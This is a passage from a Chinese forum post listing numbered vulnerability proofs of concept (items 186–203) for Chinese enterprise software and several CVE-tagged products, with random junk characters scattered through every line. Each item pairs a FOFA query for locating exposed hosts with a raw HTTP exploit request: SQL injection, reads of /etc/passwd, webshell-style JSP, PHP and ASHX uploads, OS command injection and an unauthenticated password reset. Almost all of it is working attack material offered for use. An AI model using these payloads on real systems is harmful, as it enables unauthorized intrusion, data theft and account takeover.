/ u5 h# Q6 O6 n! g: I* dGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1" _2 f6 T" \, o% c, m; [/ o
Host: host
( H4 t4 L6 k& Q' `6 N
C5 d8 u. S9 j; X6 G E2 {8 v* [2 d+ t" A. M( G) b: _
186. F-logic DataCube3 SQL注入
4 M, ~6 x, [8 R9 rCVE-2024-317501 S. t1 b2 V: l" l
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统( O5 x. \0 `, ?" C1 [8 `
FOFA:title=="DataCube3"
1 y/ [4 V+ Z7 L, [3 {POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
/ {, G5 G/ w" w6 ?" @Host: your-ip
* ]) P) _! j# }' T; C \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
9 n$ v; P* m* x7 G( J5 u3 |0 ^1 eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
! X! j" L/ I$ b* d0 z, O; DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& b% N% L% G1 b% ]! K3 \# i
Accept-Encoding: gzip, deflate- q1 I5 P- Q* @
Connection: close9 A/ S, ?2 W8 C; P8 ^0 L! R
Content-Type: application/x-www-form-urlencoded1 ], y% s9 {& b/ H, K
+ k5 x; f- D2 f: N5 S8 f6 i
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450) A7 ^7 I6 B0 q! @
* f0 D+ g- k" K: V2 z% |% \0 b
' Q* I9 g9 S- J8 L2 E187. Mura CMS processAsyncObject SQL注入
% v) a2 Q( H& v. ?, t* zCVE-2024-32640
! W* V3 B( S7 c' v/ JFOFA:"Mura CMS"
0 g1 Y% J- N5 o+ y1 K. ZPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1, u, N8 e$ L2 B+ y D' x. o
Host: your-ip
5 G$ W }6 |: PContent-Type: application/x-www-form-urlencoded
, {9 i) [7 t- b1 T' S) @- f7 @
* j2 W% N6 Z- r L% h t/ o' s( x
; W) ?8 c1 ~ Iobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1( U1 }- @' N. ^
3 N1 j: n! d& E! \ E ?
9 ~. e2 L( Z0 o; O) t' n188. 叁体-佳会视频会议 attachment 任意文件读取
9 r/ o0 O- V2 w4 Q3 ~+ fversion <= 3.9.7- h, z6 @0 `, e! {) r
FOFA:body="/system/get_rtc_user_defined_info?site_id"4 o& l0 a, W# ], p$ }7 M+ |
GET /attachment?file=/etc/passwd HTTP/1.1$ H& P/ V% o. r
Host: your-ip+ m3 _+ o3 [# c0 Z& l7 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) z6 b. r6 u* h% V5 B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7& F4 ~/ S- [; O# @8 d
Accept-Encoding: gzip, deflate
, m$ k2 k% y5 L* l3 ?# P$ ]* j: TAccept-Language: zh-CN,zh;q=0.9,en;q=0.83 H$ Z0 L$ Z1 ]+ g0 i; G9 g
Connection: close
* i" \* V& U0 b7 s5 ^, A8 C: ]0 ~8 C6 D; J+ r k& J8 S
$ H$ d- _! a- d/ @189. 蓝网科技临床浏览系统 deleteStudy SQL注入5 R4 U) m0 f F" ]5 q
FOFA:app="LANWON-临床浏览系统"/ M/ \: x2 b- q- r, _& L1 D
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1, J7 ?" A: Q. b: D9 I. R5 p
Host: your-ip
& }* K9 C" a: c. t' |User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- I6 _% U5 b" K+ @# h% {! c; r( pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 A5 x! M4 m+ z) R J5 OAccept-Encoding: gzip, deflate+ [* P+ l6 A4 @) i* `" A9 ~* e; u
Accept-Language: zh-CN,zh;q=0.9
9 J2 q. n% `6 q7 A' Q- \4 |+ ZConnection: close
7 c6 j9 f* o. z( _ K+ x
# R4 R3 r8 C& F& e2 O6 d' W. ]6 g/ l: e0 O: S
190. 短视频矩阵营销系统 poihuoqu 任意文件读取) B* j5 t/ g, i9 t Y6 r; |
FOFA:title=="短视频矩阵营销系统"
/ C9 {& Q6 F0 ^- {POST /index.php/admin/Userinfo/poihuoqu HTTP/28 c% x; f9 g) u' p; P) A
Host: your-ip
, _( k, N& r4 Q! w. ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
$ I$ Q' y5 v3 s- g, W9 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.96 d3 z4 E0 [: P/ d
Content-Type: application/x-www-form-urlencoded
. U' B( g: W* j3 X0 ZAccept-Encoding: gzip, deflate
* X0 L1 A/ d" z( j. `( l. VAccept-Language: zh-CN,zh;q=0.9 L: U% m; b, Y( s9 ?9 ~" ^
4 u* t8 h' S+ }: T' jpoi=file:///etc/passwd2 B% Z& p2 K/ T# x& y/ v
3 C/ d: \6 \4 L* v
0 o1 j' W$ O B
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
: j) K9 S9 E5 ^7 QFOFA:body="/CDGServer3/index.jsp"/ l3 Z5 U! f/ x
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
* d! f9 g" f+ A/ ]0 x4 n* qHost: your-ip; X" ^* D9 M( a% Y0 A8 X! X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. O) w/ d! Z/ j. r9 m' l3 {% {0 K ]
Content-Type: application/x-www-form-urlencoded7 K) j+ E) ]# ?) T8 m4 s
U/ y7 v/ K5 I* p5 m; @
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=: g8 r8 r. b) D1 K# ]
w' U# r3 Q0 R- R9 X1 w9 ]. e8 J ?% ~# ] i$ n, z4 A8 e
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
! P' O6 e2 E, bFOFA:title="用户登录_富通天下外贸ERP"3 E. }! ]5 U, g5 d0 P. m
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
9 ]' F* \3 R; R8 L, {# NHost: your-ip* g( {( X' A$ I) r0 ?( D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
9 g* p$ ~5 N8 e/ uContent-Type: application/x-www-form-urlencoded0 n2 r+ K3 L, e' s. U$ `
& |; B( ]; O, \7 \- F0 a
& d* n" c1 P- v" K1 \) z1 q
<% @ webhandler language="C#" class="AverageHandler" %>
; o9 b5 G& d6 T4 x( ]using System;+ J- G3 W6 M0 f
using System.Web;
$ F- }5 H1 U4 i$ {7 [# q; D# npublic class AverageHandler : IHttpHandler; T: P" F9 b& O6 q$ n: M/ j
{/ [3 F0 |& C* X, p
public bool IsReusable+ p6 g% f$ t$ K7 \0 x8 g
{ get { return true; } }1 k* N3 W/ {7 _( @; u Q
public void ProcessRequest(HttpContext ctx)
8 p$ H2 O1 u/ J) e k{' ^2 v. f. L/ D: K! W& N3 B
ctx.Response.Write("test");
0 |6 ~8 X9 x- d% M8 J}
, d% n. l# k* f! K/ b}
4 Z0 t) H r- k t6 X
; n% ?' Q$ C1 N" ~8 X2 g
1 T$ R/ ]# [9 h* R5 j3 T& ~193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
' q, E! i+ x5 UFOFA:body="山石云鉴主机安全管理系统"
" c% f5 v! D- K* aGET /master/ajaxActions/getTokenAction.php HTTP/1.15 I8 A- U8 b7 k' q
Host:
$ s" g8 Q* b5 a* W, S9 k ^0 v2 yCookie: PHPSESSID=2333333333333;& `: r" r! ]8 ^
Content-Type: application/x-www-form-urlencoded
- `' J6 s4 Y/ ~1 k3 a: gUser-Agent: Mozilla/5.0! W1 h9 N0 f% Z" n
! Y. _% Y, o5 r
$ M' p5 R9 L9 M c5 E h& _POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
* |2 i0 z& `+ {& A$ Y3 |Host:
8 E3 S5 a- X' z+ rUser-Agent: Mozilla/5.0* W1 x+ s# y/ L% t! @2 m
Accept-Encoding: gzip, deflate
0 a- ]. }+ t" T2 oAccept: */*
# {# |; @; c/ G/ ]( E+ KConnection: close
3 p- C# H y7 O3 Y* vCookie: PHPSESSID=2333333333333;
2 `) U% J) c/ E* V0 O, f' U; sContent-Type: application/x-www-form-urlencoded
( m3 u% P& w, a9 v1 tContent-Length: 84
$ ?1 E) c! f& w1 B. j/ M! E
3 x! h) o) H! Y m5 eparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')) E3 C3 y; L: k1 U& j' i8 ~
$ b$ r4 h8 o; ]/ u+ [
5 t$ y6 N4 n# rGET /master/img/config HTTP/1.1
% A) `9 [# `$ E' {Host:
. @! V- f: Z; k" m- JUser-Agent: Mozilla/5.0! x( E' |. M8 U
( D8 i4 w X( K9 c6 m
5 m" r3 v; P7 _" k; m194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
* Y2 T9 x. k! F e! y. BFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
) l X7 m7 X1 ^2 o: |% z$ F
- ^+ N j' D2 l) o. z- pPOST /servlet/uploadAttachmentServlet HTTP/1.1) I: l' z. g- Q/ ~" _0 Q
Host: host
/ g% U, ^ u) N" p D% QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
/ d7 x3 z3 E$ U- x6 T m& M% U+ lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 @/ y* g n/ hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 g& Q! y- ~* J( c+ |0 w3 q
Accept-Encoding: gzip, deflate3 [' Y! \2 m- x% W
Connection: close
5 G* P' N1 }" Z! U4 m" gContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
) M6 ] Q2 C. z4 @$ H------WebKitFormBoundaryKNt0t4vBe8cX9rZk
% f% b9 K, [- {$ V7 U {
6 Z6 j, k' S* Z. ?* l) L! ~Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
0 o- v# n+ n% A- s. i2 BContent-Type: text/plain, T. @. h m% t5 |, i- W1 n3 U
<% out.println("hello");%>' x) j1 |; n. f' e9 `! E. j& P
------WebKitFormBoundaryKNt0t4vBe8cX9rZk- i# ?# g" r$ I( h* u
Content-Disposition: form-data; name="json"2 X5 b8 d6 U4 H$ O
{"iq":{"query":{"UpdateType":"mail"}}}; @$ ]; W4 W! E+ E2 k
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--4 N$ X$ h3 x0 P; P% f8 z1 N6 c0 s
) Z4 N( t. u5 z2 K9 A! |/ A
; Q) ]: g$ \4 o2 W% M
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行. J6 L5 M( X+ p+ k* f0 x
FOFA:title=="飞鱼星企业级智能上网行为管理系统
& F& A+ J% ]3 N( D2 j/ tPOST /send_order.cgi?parameter=operation HTTP/1.1
: W G5 {0 M: T3 e: ZHost: 127.0.0.1
- C+ f$ a! \+ ?# {+ qPragma: no-cache
, _3 Z* k+ Z/ `3 N0 PCache-Control: no-cache% U0 H2 i+ w4 O7 A1 I7 z2 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* c5 ~1 p2 ?$ a/ i# H: sAccept: */*6 b2 v3 f5 [" k' G+ @% J
Accept-Encoding: gzip, deflate
" W7 f; d) K2 T1 G% GAccept-Language: zh-CN,zh;q=0.9/ f1 G' j! s9 A. f
Connection: close
- ]$ V6 |# F. W- ~! _Content-Type: application/x-www-form-urlencoded$ S" q0 g2 K3 ]! y7 X% p
Content-Length: 68
- b( Z8 R( u* x1 Q
, c6 w0 Z4 a" ~, f0 d" m{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}" ]0 l! f, m) u3 A1 h
/ r& B G5 V/ o& A4 {1 O F |* M1 I4 D) v$ u( A
196. 河南省风速科技统一认证平台密码重置) P7 \0 z$ n: d( ]' w3 z9 S% f
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
# q# Z& V+ D/ f: F" E3 {$ l1 K* IPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1+ W. |' H+ P, A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 v7 G; w% w Q2 S* l& RContent-Type: application/json;charset=UTF-8
7 F( _* j7 B; q ?# EX-Requested-With: XMLHttpRequest5 z' M6 u9 _1 n- Q" d( x, \3 d8 D
Host:% Z+ o3 }1 F; B
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' V/ A- C1 X' G4 ~& _; J
Content-Length: 45- v# d1 ^7 }& G# n- S
Connection: close- v4 V/ j- z6 }; U, Y: v L
$ R; Q. Y" H7 z( e+ b{"xgh":"test","newPass":"test666","email":""}
7 F5 m# K+ Y1 r# j2 L# N0 ~3 X! f3 y8 Q
3 s; I, i- {% ?& O
/ @' f1 H( K; |9 u4 d2 |# U- _# f: Q& O/ C8 S0 X
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ A& y1 }7 A" O6 \' e: I) n( J( B5 O
FOFA:app="浙大恩特客户资源管理系统"0 M2 E9 N; }2 [
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1$ K [6 Y* P/ ^2 h# g @
Host:# q9 l3 r5 |) P# G4 Q; I1 w9 H: n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
6 O, I4 @6 S8 l" N$ k6 xAccept-Encoding: gzip, deflate
2 X' |. ]$ w& XConnection: close' f1 E- K4 O9 L* h
+ k" o! ~9 i' }/ L: ]( V7 G) B$ ?$ @$ ]8 q- u
- w& S7 U$ u R9 r7 ?. i4 G9 |1 E
198. 阿里云盘 WebDAV 命令注入2 p" n( n5 [; F& t
CVE-2024-29640
) a6 h' j' a* U3 T Z- ~2 R7 iGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1. C7 j, U3 P# m% y3 e# \1 P4 C
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64" m) }; b# z, m$ w' v) h+ a5 @
Accept: */*, [* T" i0 `; s2 U& T/ N* O3 n
Accept-Encoding: gzip, deflate4 E, K( z$ ?" X6 n. z% \+ E
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6& J4 j! `: t g9 ~4 f7 u& r
Connection: close
9 L& c9 ?2 v4 o3 O* ^* G; N
3 K5 B% H( k7 ~9 t" |. ^1 O4 U
4 n( p: G/ M- |* _; M199. cockpit系统assetsmanager_upload接口 文件上传 r6 X0 h$ t3 l! \2 ^1 \
$ f$ H/ L0 B! B5 H: R0 U
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:! ], ]% Q) \$ C5 p1 o
GET /auth/login?to=/ HTTP/1.1
( o x* q) o% @+ v4 E5 d4 k- w' G) K1 U% y' k; f" g
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw") w) h( z" f" g1 W! ~, O" ^
; t- L) ~6 M4 q- x" z2 ? s! E
2.使用刚才上一步获取到的jwt获取cookie:* G# s- s9 _0 f+ t, Y% N
$ s1 p1 C) Y. e9 t' |2 [* Q9 uPOST /auth/check HTTP/1.1& O2 V1 i" p6 R7 X% g
Content-Type: application/json
* F$ D W: a, H T' r0 I J, b4 H" v& D8 }
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}( z2 S& _' o9 U/ S/ n
|% h+ d, j( Q. d
响应:200,返回值:8 P" X) x8 C% L
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/( D( y/ o- q$ i
Fofa:title="Authenticate Please!"
2 o! X& f/ h( i" o: MPOST /assetsmanager/upload HTTP/1.1
( A7 B( E Z6 wContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
( M3 R$ b& T) g# x8 y' Y. }0 [Cookie: mysession=95524f01e238bf51bb60d77ede3bea921 C4 a; p: ~- }4 I) F
" b+ L% c8 c7 n' w/ [-----------------------------36D28FBc36bd6feE7Fb3
2 g Q. V3 I0 c6 ]$ y7 tContent-Disposition: form-data; name="files[]"; filename="tttt.php"4 {1 I+ M$ o3 i- j. F: {+ r
Content-Type: text/php
% V: v v/ L; P! E1 w: u z) P7 ^9 b% a& c* W& w+ m
<?php echo "tttt";unlink(__FILE__);?>
. W3 C9 c: X; _7 ?+ b3 B-----------------------------36D28FBc36bd6feE7Fb33 i: ]% e6 ? x& |' n+ G2 y
Content-Disposition: form-data; name="folder"
$ \# b7 k% d$ X' h8 A; @% j2 `2 F. @& j% B- O
-----------------------------36D28FBc36bd6feE7Fb3--
& S2 G) z5 ^# [, ?( k+ ^+ e+ `* m6 [: I
& Q# D) \* e% I0 |$ I
/storage/uploads/tttt.php, o# h. l- _% |$ Q/ w3 v
+ N; V, l; E, T- n! w& a, u- Q8 s6 K200. SeaCMS海洋影视管理系统dmku SQL注入5 v. o3 M7 u2 x: H: w( _
FOFA:app="海洋CMS"
; ?. U7 G/ x% \GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.19 O1 m4 `% Y- ]. C* t
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
$ ]6 x9 s4 p( \; E" b6 U( w% U. fUpgrade-Insecure-Requests: 11 D+ Z: V/ n* t$ l$ `
Cache-Control: max-age=0
7 x3 l+ t$ V- C9 hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 ?2 P$ a$ v7 DAccept-Encoding: gzip, deflate$ Z! H2 K4 G; g2 f, V- G
Accept-Language: zh-CN,zh;q=0.9) E- f2 N1 {5 j; K: p1 l
, f3 X6 | N2 F u
) U' k# ]. F5 ^
201. 方正全媒体新闻采编系统 binary SQL注入* ^ _$ q- G) ^7 C3 X4 w9 [# }. H
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
* }. r n7 G Y$ R* v6 HPOST /newsedit/newsplan/task/binary.do HTTP/1.1
/ S$ K! X: O! K+ sContent-Type: application/x-www-form-urlencoded
6 x) H1 b+ J: S6 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 p0 E) r8 F/ I
Accept-Encoding: gzip, deflate
& P& ^$ f" {4 q: AAccept-Language: zh-CN,zh;q=0.9: \5 ]5 l$ L- D6 x
Connection: close
* j/ H! m) x% H1 {
% I4 s6 _1 j4 ~9 HTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=13 @2 |" O0 ]) s; w* o: F
9 |5 c# t( w% h6 s5 P$ i
6 c9 d) b e4 s7 Z
202. 微擎系统 AccountEdit任意文件上传, p9 {8 l/ J1 |/ q) \" m; h
FOFA:body="/Widgets/WidgetCollection/"
: S7 m, `9 @# e获取__VIEWSTATE和__EVENTVALIDATION值
. K( [- Z9 f M) @/ b7 bGET /User/AccountEdit.aspx HTTP/1.1
/ }9 P4 Y4 v# QHost: 滑板人之家
9 i+ v0 E8 Z' F ^+ J4 s+ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
4 t; `2 U% L- b b+ c. ~1 xContent-Length: 04 h: n _6 u8 K& w8 H3 I2 s
* N& |) K2 D4 I+ u; E
. v6 L* [5 C% p" L* g替换__VIEWSTATE和__EVENTVALIDATION值
5 i x5 s8 {1 v* lPOST /User/AccountEdit.aspx HTTP/1.1
. ~6 Q, L7 i% @% B& }+ V- NAccept-Encoding: gzip, deflate, br
C7 b7 b$ R7 `: c0 j) X4 u6 TContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687: S2 a, q, P6 e1 Q
+ n! {0 t' f) `$ M7 Q-----------------------------786435874t385875938657365873465673587356876 s4 B x5 y5 y. S) o' L. R1 B$ _
Content-Disposition: form-data; name="__VIEWSTATE"
5 _6 ^, i; a3 ~% j/ {7 h' H5 j9 \" T X7 o* F
__VIEWSTATE
' `. @& Y5 D- Z( ?0 J. |/ y-----------------------------786435874t385875938657365873465673587356870 x, P$ x3 j$ A' n+ Z; m @
Content-Disposition: form-data; name="__EVENTVALIDATION"" N+ n8 F% P! w5 w6 v
3 c1 ~7 s& K; a" a
__EVENTVALIDATION' k. i( _4 V( ?2 u- e) X, ^
-----------------------------786435874t385875938657365873465673587356873 W9 N) i) \3 [; \ p4 ^% i/ J! ]
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
* \/ f5 }" D9 `$ ~Content-Type: text/plain+ I5 {' S; P% h: w/ i# L
2 r9 A* u8 M4 o9 p [6 EHello World!& x9 Y4 k: g0 M# X8 G2 o
-----------------------------786435874t38587593865736587346567358735687/ n: Y) S" t, l `0 c
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
) k+ {. ^' l8 k- I& Z8 ]
& n* }+ t/ G) h上传图片. F" R# C6 m) d3 p, Q& [" i, w
-----------------------------786435874t38587593865736587346567358735687
1 R* d0 C2 ?. WContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
5 i0 Z. c5 z4 ^! B$ M' T( s" E
) @3 K, G1 t; S2 k* I# m7 I q4 Z2 F1 C: }0 l& Z
-----------------------------786435874t38587593865736587346567358735687* N) x' E* d( U. C
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
$ w7 u) |$ z7 v( E# {, d' K5 V! `1 a
4 ]; U) }- k9 d' r
-----------------------------786435874t38587593865736587346567358735687--
+ K$ i; a5 I5 q+ T
5 `* j* l" f& Z s6 d3 X! [
; L8 f( D) W5 h- R( `4 M& n/_data/Uploads/1123.txt: k: F; b! r5 _. [; |: O
, O$ p1 Y4 z- O7 k# I& r203. 红海云EHR PtFjk 文件上传
8 A6 ?3 U3 |* | `. t5 S: IFOFA:body="RedseaPlatform"
2 V$ B2 j& D) G7 d5 z: |2 WPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.12 X0 G+ H* q/ I0 y. h1 w
Host: x.x.x.x
" R' v3 p4 m0 h# ^Accept-Encoding: gzip( P& z3 R% c: M" L" A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) t; j* H; `# ~! T8 L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
: F J7 Z3 _: D7 w) O! v( c9 E- dContent-Length: 210; a& v# K+ O) s
& s+ x: x/ p; Y1 u5 a3 T6 N, y' ^
------WebKitFormBoundaryt7WbDl1tXogoZys4
0 W$ A- |6 H2 \1 `( L# y" v+ TContent-Disposition: form-data; name="fj_file"; filename="11.jsp", L+ Q6 M k4 f$ A9 @
Content-Type:image/jpeg
# d9 Q; ?& D* k: `# `
5 a0 O0 E* n' A2 z( `<% out.print("hello,eHR");%>- _) N% Q0 |0 [+ ~6 s% e
------WebKitFormBoundaryt7WbDl1tXogoZys4--
, _9 S, X1 ^' c8 y n
( {* s+ ?2 v+ d2 o3 m6 c $ e1 V& N$ R8 k4 T" R
2 l5 z( S% h+ {& |$ h4 r2 `: a
& Q8 [0 v/ M: G' E$ G
' y! C4 v, N: R
: E1 o2 G, R# D( @5 _7 q1 D |
发表于 2024-6-5 14:31:29
收藏
支持
反对